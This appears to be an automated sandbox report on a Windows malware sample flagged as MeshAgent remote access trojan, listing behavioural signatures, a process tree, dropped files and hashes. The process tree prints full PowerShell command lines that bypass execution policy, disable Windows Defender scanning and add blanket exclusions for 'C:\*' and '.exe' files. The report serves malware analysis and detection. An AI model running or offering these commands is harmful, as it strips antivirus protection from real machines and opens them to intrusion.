Analysis

  • max time kernel
    94s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-09-2024 22:46

General

  • Target

    2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe

  • Size

    19.0MB

  • MD5

    c48e8edc68378461a358bf76afb2cb50

  • SHA1

    1457f5eda579ad7b4772e16378e1d6de312b66c3

  • SHA256

    eae7ea70c95f35b473b9ae7cba6079b6b26d15f4c7167d7119ed4cb0afd7880b

  • SHA512

    77a90eac1d5ab5d59a3c6b0ed8d3700edbfd6096b4c6fa8b03f8802b22234cc384aa7f58b115435629649655fac4144e6d78aaa21e68e2e930e09214b9885bd4

  • SSDEEP

    196608:XDfS4aFBcMkZbmna1cCwvylAjWZ0Xq9YLuxMfCVb2:faF/CinaqtvylAjWZ0Xq9YLuxMfCVb2

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-09-24_c48e8edc68378461a358bf76afb2cb50_hijackloader_poet-rat_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell " # chcp 65001 > $null; # <-- not working; [Console]::OutputEncoding = [Text.Encoding]::UTF8; # 👈 add this at begin; Get-NetAdapter | foreach { $_ | Select-Object -Property ifAlias, InstanceID } | ConvertTo-Json"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1272
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:4776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:376
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2804
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4664
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3992
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:4196
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1368
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:2316
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:4512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:3908

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    ccd5df1b2fc53622941f37656d05d9ae

    SHA1

    262f63a6df3450df74215fe2555a9d7002929101

    SHA256

    1c3322f3cbb6d038440ec7a75a3fa5c2f663dac3bb23630db29ad4f5ae180104

    SHA512

    2b85d4cb67230a610a476b62591ccfd6a94f0010210016a260c747aa86959e0badcfb7706698513566dced03b0799e22d25885396fee153c99e7c2d214aaba62

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0dfa2abef09ea2b3e8423fb7833684fd

    SHA1

    bfbb0511214c332a57778b3707632bfeffb6e781

    SHA256

    7d74773bd09edc36531bcd0f5777254480155694c136c38eb1087ff1a3138c52

    SHA512

    ceb2de65e696f07ebf41453b9341ef3b35ec1a816325d29136bf165aed780bbd5608ed0d96fde46fddaf7be261b062ac95125815616e85884158cfff3b87ede7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    7a2650a3a864ce36b4edd2168162f6a4

    SHA1

    c5bbf438570fcb5b289d3379c9fad2b391976379

    SHA256

    ed714586203aa7c85099686e71e5a35c18cfd7fdf46d0f0831aaf87967f0a11d

    SHA512

    9feff35421180fd34123a9b589a136eb379edb67a3d0e096a0401ed69f2ec93bd76d740f4243ff1ce30ad1b86036cc63de6603d72a7d7891cd8b4272ee5fe560

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dnd2dl34.255.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\naver\naver.db.tmp

    Filesize

    131KB

    MD5

    5afb7fcd97a028b334e94d2dedbbc598

    SHA1

    00463a944db47fa2392c67459f154fcd06fc29bd

    SHA256

    b49a2585225b96759e4f770833abf2fe4869138dc0c172e0c094382a6e002c55

    SHA512

    01942917f588996cb9d66b21977c7ea06f179c660899c9cf4cb0a0a1310102a9097b0395a4e1f685aedf9ba15c1f6e8cb627073a7ab2f033f59c85188fdea3f5

  • C:\Users\Admin\AppData\Local\naver\naver.exe

    Filesize

    5.3MB

    MD5

    b8d9e0cbbe14c0d930863662e263541c

    SHA1

    b0b51d92b92f21ec721d1cf7cd2358fa81b9fe09

    SHA256

    4b7c8a0f0074b2cd7ac1671f58dfc746fa35b9164462401b1e30710d1dbb6ec9

    SHA512

    a73a40cb1c10a5dad67c39e8d3c4148288a7d869034e813b8bae191c7f8f3d9d07c887decfd3bdb6700c17a8fce303b0df5c8f604ebb3998306c1447bba0b1f7

  • C:\Users\Admin\AppData\Local\naver\naver.msh

    Filesize

    22KB

    MD5

    2dd515ea546a81398d94dd15e3b4d55c

    SHA1

    eb0b0fca721a296906166b7e972559b87353b726

    SHA256

    becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

    SHA512

    439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

  • memory/1308-41-0x000001AFF08C0000-0x000001AFF0936000-memory.dmp

    Filesize

    472KB

  • memory/1308-40-0x000001AFF0470000-0x000001AFF04B4000-memory.dmp

    Filesize

    272KB

  • memory/1984-12-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-18-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-15-0x000001EBCDD00000-0x000001EBCE228000-memory.dmp

    Filesize

    5.2MB

  • memory/1984-14-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-13-0x000001EBCD600000-0x000001EBCD7C2000-memory.dmp

    Filesize

    1.8MB

  • memory/1984-0-0x00007FFCCF103000-0x00007FFCCF105000-memory.dmp

    Filesize

    8KB

  • memory/1984-11-0x00007FFCCF100000-0x00007FFCCFBC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-10-0x000001EBCD0E0000-0x000001EBCD102000-memory.dmp

    Filesize

    136KB